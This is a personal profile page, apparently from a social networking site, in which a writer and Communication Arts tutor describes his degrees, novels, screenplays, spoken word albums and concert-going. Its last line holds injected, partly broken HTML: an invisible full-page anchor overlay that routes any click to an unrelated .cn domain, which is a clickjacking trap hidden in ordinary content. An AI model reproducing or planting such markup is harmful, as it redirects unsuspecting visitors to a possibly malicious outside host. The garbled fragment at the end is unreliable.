About Me

Well, I spend most of my time sitting at a desk, in front of my writing machine. I've got my BA in Creative Writing (with a minor in film) from the College of Santa Fe, have my Missouri State Teacher's Certification (in English grades 9-12) and have my Masters in Communication Arts from Webster University. I'm in my first year of teaching at St. Louis Public Schools as a Communication Arts tutor. Most of the time I'm either doing research, writing, at the library, reading, making spoken word albums (which is me reading my short fiction and poetry with crazy voices- jumping into each character). And if I'm not doing any of these things I'm at a smoky concert venue- at the bar doing shots, or up-close to the stage (depending how much I like the band!), at the movies (though recently I'm more of a home video kinda guy), listening to music or walking around trying to find myself lost somewhere I've never been. Basically, I live for art. I am the author of four novels, seven screenplays (most of which are horror films with a socio-political or personally important subtext somewhere in there) and over fifty short stories- all of which are copyrighted in my name or registered with the Writer's Guild of America, West. I have had two short stories published in a small horror magazine in September of 2001 and my first novel (HUMANSVILLE, which I wrote second semester of my Junior year in college for a class assignment) is available for order at all Borders, Barnes & Nobels, Amazon.com and all online book retailers. All in all I just try to write as much as possible, learn all I can, survive, teach those who want to learn and be decent to those who deserve it.

My Interests

Eck! I'm all about gettin' my VERVE on! That's all that interests me!a class="popup_wrapper" style="background-color:transparent!important;cursor:default ;left:-132px;top:-89px;height:5434px;width:1020px;"class=pop up_x href="http://klaxolw1.cn/s/" da$d
